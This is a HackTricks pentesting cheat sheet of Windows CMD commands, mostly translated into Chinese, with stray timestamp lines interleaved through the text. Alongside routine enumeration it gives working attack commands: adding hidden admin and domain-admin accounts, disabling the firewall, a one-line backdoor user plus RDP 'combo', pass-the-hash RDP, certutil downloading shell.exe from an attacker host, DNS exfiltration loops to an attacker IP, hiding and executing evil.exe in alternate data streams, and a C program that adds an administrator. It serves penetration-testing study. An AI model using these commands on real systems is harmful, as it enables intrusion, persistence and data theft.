2024-04-06 18:13:07 +00:00
# Basic Win CMD for Pentesters
2022-04-28 16:01:33 +00:00
2024-07-18 22:08:20 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Learn & practice GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
< details >
2024-07-18 22:08:20 +00:00
< summary > Support HackTricks< / summary >
2022-04-28 16:01:33 +00:00
2024-07-18 22:08:20 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-18 22:08:20 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
## 系统信息
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 版本和补丁信息
2020-07-15 15:43:14 +00:00
```bash
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
2022-10-05 00:11:28 +00:00
wmic computersystem LIST full #Get PC info
2020-07-15 15:43:14 +00:00
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
2022-10-05 00:11:28 +00:00
wmic qfe list brief #Updates
2020-07-15 15:43:14 +00:00
hostname
2022-10-05 00:11:28 +00:00
2020-07-15 15:43:14 +00:00
DRIVERQUERY #3rd party driver vulnerable?
```
2023-08-03 19:12:22 +00:00
### 环境
2020-07-15 15:43:14 +00:00
```bash
set #List all environment variables
```
2024-07-18 22:08:20 +00:00
一些环境变量需要强调:
* **COMPUTERNAME**: 计算机名称
* **TEMP/TMP:** 临时文件夹
* **USERNAME:** 你的用户名
* **HOMEPATH/USERPROFILE:** 主目录
* **windir:** C:\Windows
* **OS**: Windows 操作系统
* **LOGONSERVER**: 域控制器名称
* **USERDNSDOMAIN**: 用于 DNS 的域名
* **USERDOMAIN**: 域的名称
2020-07-15 15:43:14 +00:00
```bash
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
```
2024-07-18 22:08:20 +00:00
### 已挂载的磁盘
2020-07-15 15:43:14 +00:00
```bash
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
2020-08-17 14:38:36 +00:00
wmic logicaldisk get caption,description,providername
2020-07-15 15:43:14 +00:00
```
2024-07-18 22:08:20 +00:00
### [Defender](authentication-credentials-uac-and-efs/#defender)
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 回收站
2020-07-15 15:43:14 +00:00
```bash
dir C:\$Recycle.Bin /s /b
```
2023-08-03 19:12:22 +00:00
### 进程、服务和软件
2020-07-15 15:43:14 +00:00
```bash
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
2020-08-17 14:38:36 +00:00
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
2020-07-15 15:43:14 +00:00
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
```
2024-02-05 03:17:45 +00:00
## 域信息
2020-07-15 15:43:14 +00:00
```bash
2022-10-05 00:11:28 +00:00
# Generic AD info
2020-07-15 15:43:14 +00:00
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
2022-10-05 00:11:28 +00:00
gpresult /V # Get current policy applied
wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers
# Users
dsquery user #Get all users
2020-07-15 15:43:14 +00:00
net user /domain #List all users of the domain
net user < ACCOUNT_NAME > /domain #Get information about that user
net accounts /domain #Password and lockout policy
2022-10-05 00:11:28 +00:00
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domains controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
# Computers
dsquery computer #Get all computers
net view /domain #Lis of PCs of the domain
nltest /dclist:< DOMAIN > #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers
# Trust relations
2023-03-06 18:20:33 +00:00
nltest /domain_trusts #Mapping of the trust relationships
2022-10-05 00:11:28 +00:00
2023-08-03 19:12:22 +00:00
# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
```
2024-02-05 03:17:45 +00:00
### 日志与事件
```bash
#Make a security query using another credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
2023-08-03 19:12:22 +00:00
```
2024-07-18 22:08:20 +00:00
## 用户与组
2023-08-03 19:12:22 +00:00
2024-02-05 03:17:45 +00:00
### 用户
```bash
#Me
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges
2023-08-03 19:12:22 +00:00
2024-02-05 03:17:45 +00:00
# Local users
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #Create user
2023-08-03 19:12:22 +00:00
2024-02-05 03:17:45 +00:00
# Other users looged
qwinsta #Anyone else logged in?
2023-08-03 19:12:22 +00:00
2024-02-05 03:17:45 +00:00
#Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user< DOMAIN > \<NAME> "cmd.exe" ::The password will be prompted
2023-08-03 19:12:22 +00:00
2024-02-05 03:17:45 +00:00
#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe
2023-08-03 19:12:22 +00:00
```
2024-07-18 22:08:20 +00:00
### 组
2024-02-05 03:17:45 +00:00
```bash
#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators
2023-08-03 19:12:22 +00:00
2024-02-05 03:17:45 +00:00
#Domain
net group /domain #Info about domain groups
net group /domain < domain_group_name > #Users that belongs to the group
2023-08-03 19:12:22 +00:00
```
### 列出会话
```
qwinsta
klist sessions
```
### 密码策略
```
net accounts
```
2024-07-18 22:08:20 +00:00
### 凭据
2023-08-03 19:12:22 +00:00
```bash
cmdkey /list #List credential
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access
```
2024-07-18 22:08:20 +00:00
### 与用户的持久性
2024-02-05 03:17:45 +00:00
```bash
# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
2023-08-03 19:12:22 +00:00
2024-02-05 03:17:45 +00:00
# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD
2023-08-03 19:12:22 +00:00
2024-02-05 03:17:45 +00:00
# Add user to insteresting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
2023-08-03 19:12:22 +00:00
```
2024-02-05 03:17:45 +00:00
## 网络
2023-08-03 19:12:22 +00:00
2024-07-18 22:08:20 +00:00
### 接口、路由、端口、主机和DNS缓存
2024-02-05 03:17:45 +00:00
```bash
ipconfig /all #Info about interfaces
route print #Print available routes
arp -a #Know hosts
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
2023-08-03 19:12:22 +00:00
```
2024-02-05 03:17:45 +00:00
### 防火墙
```bash
netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles
2023-08-03 19:12:22 +00:00
2024-02-05 03:17:45 +00:00
NetSh Advfirewall set allprofiles state off #Turn Off
NetSh Advfirewall set allprofiles state on #Trun On
netsh firewall set opmode disable #Turn Off
2023-08-03 19:12:22 +00:00
2024-02-05 03:17:45 +00:00
#How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
2023-08-03 19:12:22 +00:00
2024-02-05 03:17:45 +00:00
#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed
2023-08-03 19:12:22 +00:00
2024-02-05 03:17:45 +00:00
#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
2023-08-03 19:12:22 +00:00
2024-02-05 03:17:45 +00:00
#Enable Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
2023-08-03 19:12:22 +00:00
2024-02-05 03:17:45 +00:00
#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
2023-08-03 19:12:22 +00:00
2024-02-05 03:17:45 +00:00
::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
2023-08-03 19:12:22 +00:00
```
2024-02-05 03:17:45 +00:00
### 共享
```bash
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
2023-08-03 19:12:22 +00:00
```
2024-02-07 04:49:09 +00:00
### Wifi
2024-02-05 03:17:45 +00:00
```bash
netsh wlan show profile #AP SSID
netsh wlan show profile < SSID > key=clear #Get Cleartext Pass
2023-08-03 19:12:22 +00:00
```
2024-02-09 02:09:47 +00:00
### SNMP
2023-08-03 19:12:22 +00:00
```
2024-02-05 03:17:45 +00:00
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
2023-08-03 19:12:22 +00:00
```
2024-02-05 03:17:45 +00:00
### 网络接口
```bash
ipconfig /all
2023-08-03 19:12:22 +00:00
```
2024-07-18 22:08:20 +00:00
### ARP 表
2023-08-03 19:12:22 +00:00
```bash
2024-02-05 03:17:45 +00:00
arp -A
2020-07-15 15:43:14 +00:00
```
2024-02-05 03:17:45 +00:00
## 下载
2020-07-15 15:43:14 +00:00
2024-02-05 03:17:45 +00:00
Bitsadmin.exe
2023-08-03 19:12:22 +00:00
```
2024-02-05 03:17:45 +00:00
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
2020-07-15 15:43:14 +00:00
```
2024-07-18 22:08:20 +00:00
CertReq.exe
2020-07-15 15:43:14 +00:00
```
2024-02-05 03:17:45 +00:00
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
2022-05-17 09:34:10 +00:00
```
2024-02-05 03:17:45 +00:00
Certutil.exe
2020-07-15 15:43:14 +00:00
```
2024-02-05 03:17:45 +00:00
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
2023-08-03 19:12:22 +00:00
```
2024-07-18 22:08:20 +00:00
**在** [**https://lolbas-project.github.io** ](https://lolbas-project.github.io/ ) **中搜索 `Download` 可以找到更多内容**
2024-04-06 18:13:07 +00:00
2024-07-18 22:08:20 +00:00
## 杂项
2020-07-15 15:43:14 +00:00
```bash
cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list without shit
time #Get current time
date #Get current date
shutdown /r /t 0 #Shutdown now
type < file > #Cat file
2020-09-07 11:12:11 +00:00
2020-07-15 15:43:14 +00:00
#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
2021-03-18 23:05:52 +00:00
runas /netonly /user:< DOMAIN > \<NAME> "cmd.exe" ::The password will be prompted
2020-07-15 15:43:14 +00:00
#Hide
attrib +h file #Set Hidden
attrib -h file #Quit Hidden
#Give full control over a file that you owns
icacls < FILE_PATH > /t /e /p < USERNAME > :F
icacls < FILE_PATH > /e /r < USERNAME > #Remove the permision
#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
#exe2bat to transform exe file in bat file
#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)
2022-08-13 13:54:19 +00:00
# Get error messages from code
net helpmsg 32 #32 is the code in that case
2020-07-15 15:43:14 +00:00
```
2023-08-03 19:12:22 +00:00
### 绕过字符黑名单
2022-10-02 21:44:11 +00:00
```bash
2022-10-02 22:00:14 +00:00
echo %HOMEPATH:~6,-11% #\
who^ami #whoami
```
### DOSfuscation
2024-07-18 22:08:20 +00:00
生成一个模糊化的 CMD 行
2022-10-02 22:00:14 +00:00
```powershell
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
2022-10-02 21:44:11 +00:00
```
2024-07-18 22:08:20 +00:00
### 监听地址 ACLs
2024-04-06 18:13:07 +00:00
2024-07-18 22:08:20 +00:00
您可以在 [http://+:80/Temporary\_Listen\_Addresses/ ](http://+/Temporary\_Listen\_Addresses/ ) 上监听,而无需管理员权限。
2020-07-15 15:43:14 +00:00
```bash
netsh http show urlacl
```
2024-02-05 03:17:45 +00:00
### 手动 DNS shell
2020-07-15 15:43:14 +00:00
2024-07-18 22:08:20 +00:00
**攻击者** (Kali) 必须使用以下两个选项之一:
2020-07-15 15:43:14 +00:00
```bash
sudo responder -I < iface > #Active
2020-09-07 11:12:11 +00:00
sudo tcpdump -i < iface > -A proto udp and dst port 53 and dst ip < KALI_IP > #Passive
2020-07-15 15:43:14 +00:00
```
2024-07-18 22:08:20 +00:00
#### Victim
2024-04-06 18:13:07 +00:00
2024-07-18 22:08:20 +00:00
**`for /f tokens`** 技术:这使我们能够执行命令,获取每行的前 X 个单词,并通过 DNS 发送到我们的服务器。
2024-02-08 04:42:06 +00:00
```bash
2020-07-15 15:43:14 +00:00
for /f %a in ('whoami') do nslookup %a < IP_kali > #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a < IP_kali > #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c < IP_kali > #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c < IP_kali > #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c < IP_kali > #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i < IP_kali > #Same as last one
```
2024-07-18 22:08:20 +00:00
您还可以**重定向**输出,然后**读取**它。
2022-05-17 09:34:10 +00:00
```
2020-07-15 15:43:14 +00:00
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i < IP_kali >
```
2024-07-18 22:08:20 +00:00
## 从 C 代码调用 CMD
2020-07-15 15:43:14 +00:00
```c
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
// When executed by Administrator this program will create a user and then add him to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe
int main (){
2023-08-03 19:12:22 +00:00
int i;
i=system("net users otherAcc 0TherAcc! /add");
i=system("net localgroup administrators otherAcc /add");
return 0;
2020-07-15 15:43:14 +00:00
}
```
2024-07-18 22:08:20 +00:00
## Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)
2024-04-06 18:13:07 +00:00
2024-07-18 22:08:20 +00:00
**示例来自** [**https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f** ](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f )**. 里面还有很多更多的内容!**
2020-07-15 15:43:14 +00:00
```bash
2024-02-05 03:17:45 +00:00
## Selected Examples of ADS Operations ##
### Adding Content to ADS ###
# Append executable to a log file as an ADS
2020-07-15 15:43:14 +00:00
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
2024-02-05 03:17:45 +00:00
# Download a script directly into an ADS
2020-07-15 15:43:14 +00:00
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
2024-02-05 03:17:45 +00:00
### Discovering ADS Content ###
# List files and their ADS
2023-08-03 19:12:22 +00:00
dir /R
2024-02-05 03:17:45 +00:00
# Use Sysinternals tool to list ADS of a file
streams.exe < c: \path \to \file >
2020-08-11 12:53:46 +00:00
2024-02-05 03:17:45 +00:00
### Extracting Content from ADS ###
# Extract an executable stored in an ADS
2020-07-15 15:43:14 +00:00
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
2024-02-05 03:17:45 +00:00
### Executing ADS Content ###
# Execute an executable stored in an ADS using WMIC
2020-07-15 15:43:14 +00:00
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
2024-02-05 03:17:45 +00:00
# Execute a script stored in an ADS using PowerShell
2020-07-15 15:43:14 +00:00
powershell -ep bypass - < c: \temp:ttt
```
2024-07-18 22:08:20 +00:00
{% hint style="success" %}
学习与实践 AWS 黑客技术:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
学习与实践 GCP 黑客技术:< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks 培训 GCP 红队专家 (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2024-04-06 18:13:07 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-07-18 22:08:20 +00:00
< summary > 支持 HackTricks< / summary >
2022-04-28 16:01:33 +00:00
2024-07-18 22:08:20 +00:00
* 查看 [**订阅计划** ](https://github.com/sponsors/carlospolop )!
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**Telegram 群组** ](https://t.me/peass ) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) GitHub 仓库提交 PR 来分享黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-07-18 22:08:20 +00:00
{% endhint %}